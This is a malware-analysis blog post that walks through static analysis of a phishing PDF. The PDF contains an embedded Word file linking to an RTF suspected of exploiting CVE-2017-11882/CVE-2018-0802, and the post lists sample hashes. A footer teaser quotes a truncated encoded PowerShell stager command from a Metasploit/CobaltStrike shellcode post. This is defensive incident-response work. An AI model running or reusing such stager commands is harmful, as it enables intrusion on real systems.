Skip to main content

Malicious document analysis Part-2

A basic and quick approach to analyse phishing documents to identify indicators of maliciousness. Refer Part-1 to understand the tools and approach to analyse office word document. This post covers the  static analysis of pdf document to identify suspicious objects. (FYI  running pdf in sandbox environment can give much insight related to indicators of compromise.)  FYI this post doesn't cover complete & in depth analysis (like dealing with malicious obfuscated javascripts or shellcode)  of malicious documents

All document samples are pulled from Hybrid Analysis - a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 

To analyse PDF files,  open them in a hex editor and look for the  signs of malicious
PDF files, like automatic actions, the presence of JavaScript or Flash, vulnerable encodings etc. 

/Page gives an indication of the number of pages in the PDF document. Most malicious PDF document  have only one page 
/JS and /JavaScript and /RichMedia indicate that the PDF document contains JavaScript respectively Flash. Most malicious PDF documents found in the wild contain JavaScript (to exploit a JavaScript vulnerability and/or to execute a heap spray). Of course, you can also find JavaScript in PDF documents without malicious intend. For example, government agencies are known to provides forms in PDF format with JavaScript to validate input
AA, /OpenAction and /AcroForm indicate an automatic action to be performed when the page/document is viewed. This is often used to execute JavaScript without user  interaction scan a PDF file to look for certain PDF keywords to identify PDF documents that contain (for example) JavaScript or execute an action when opened.The presence or absence of
these keywords will help you to decide if a PDF file is potentially malicious and requires further analysis, or if it is benign and requires no analysis. The keywords PDFiD looks for are 

• endobj
• stream
• endstream
• xref
• trailer
• startxref
• /Page
• /Encrypt
• /ObjStm
• /JS
• /JavaScript
• /AA
• /OpenAction
• /AcroForm
• /JBIG2Decode
• /RichMedia
• /Colors with a value larger than 2^24 will not look inside the compressed data of stream objects. You will need other tools to do this. The main purpose of is to aid you with deciding if a PDF file requires further analysis or not (especially if it comes from an untrusted source)

Check the file properties and integrity of pdf sample 

Run to identify suspicious indirect objects
identified a /JS /JavaScript and an /EmbddedFile along with an /OpenAction which means an action will be performed once the pdf is opened 

Run to search for javascript indirect object 
It was found that doc dew008.docx will be launched once pdf is opened (the other indirect objects are analysed). can do lot of good stuff here, but  is preferred here to show and extract streams in native format.

It's an interactive tool to deal with individual indirect objects/streams and also can dump streams by directing the output. can also check the reputation of pdf file in virustotal, it can give an initial glance about the nature of file. Interactive mode can be selected with -i option to look,decode and analyse streams 

Help option in interactive mode with documented commands

object <object_number> can give information about object 

Observe the stream 5 and stream 8 (it's already found through output that object 8 and object 5 has streams). The file header PK for stream 8 was found to be office word document

stream 8 is dumped and checked the metadata and file properties using file command. The hash value can be checked in VT or run doc in a sandbox environment to get more insights but, this analysis is all about analyzing document without running in any sandbox 

The dumped word file is unzipped to see for any external relationships with type oleobject which is an rtf file 

Wow! wget it and analyse 

It was up luckily :) 
ptceg.doc was downloaded and checked with file properties 
Cool ! found to be RTF ! CVE 2017-11882  ?? lets run rtfobj

Probably CVE-2018-0802 which superseded CVE-2017-11882

Further analysis need to be done !

93fc24573bd563f08b3a6a71276bfe085488d3bbb8d79bbbc3a75e5c0497e915  STN-ORDER4487599.pdf
2ce1f20a6909cfa1722ef3d5e4302ff8a8457f082c0ea2016b2e2ffd831af46f  ptceg.doc (RTF)

13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41  lhvazm.doc (RTF) 


Post a Comment

Popular posts from this blog

Memory Analysis of WannaCry Ransomware

Introduction  This post explains the memory dump analysis of WannaCry infected system using volatility (An open source memory forensics framework) and other open source tools. It doesn't cover the analysis of initial infection vector, propagation and recovery of infected system. The objective is to leverage memory forensic analysis to uncover and extract Indicators of Compromise (IoC)  WannaCry  WannaCry (or WannaCrypt, WanaCrypt0r 2.0, Wanna Decryptor) is a ransomware program targeting the Microsoft Windows operating system. On Friday, 12 May 2017, a large cyber-attack using it was launched, infecting more than 230,000 computers in 150 countries, demanding ransom payments in the cryptocurrency bitcoin in 28 languages.The attack has been described by Europol as unprecedented in scale. Discalimer You are dealing with real malware samples Don’t expose them to internal networks or internet Analyze them in a controlle

Decoding Metasploit and CobaltStrike shells

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAH

Memory dump analysis of Donny's System

Introduction  This post solves the mystery of Donny's System   and outlines how to utilize memory forensics methodology to uncover artifacts from memory dumps Tools: Volatility, Yara  & Windows Powershell Analysis Six-step investigative methodology by SANS Identify rogue processes  Analyze process DLLs and handles   Review network artifacts  Look for evidence of code injection  Check for signs of rootkit Dump suspicious processes and drivers  Run volatility  imageinfo plugin   to identify profile  PS C:\volatility> .\vol.exe -f .\unknown.vmem imageinfo Run Volatility  pslist plugin to see active running processes PS C:\volatility> .\vol.exe -f .\unknown.vmem --profile=WinXPSP3x86 pslist Just to remind that all process creation and termination timings are specified in UTC. Ensure to change them to system timezone while correlating the events with other sources of evidence game.exe clearly looks suspicious as it ran and exit in a short span o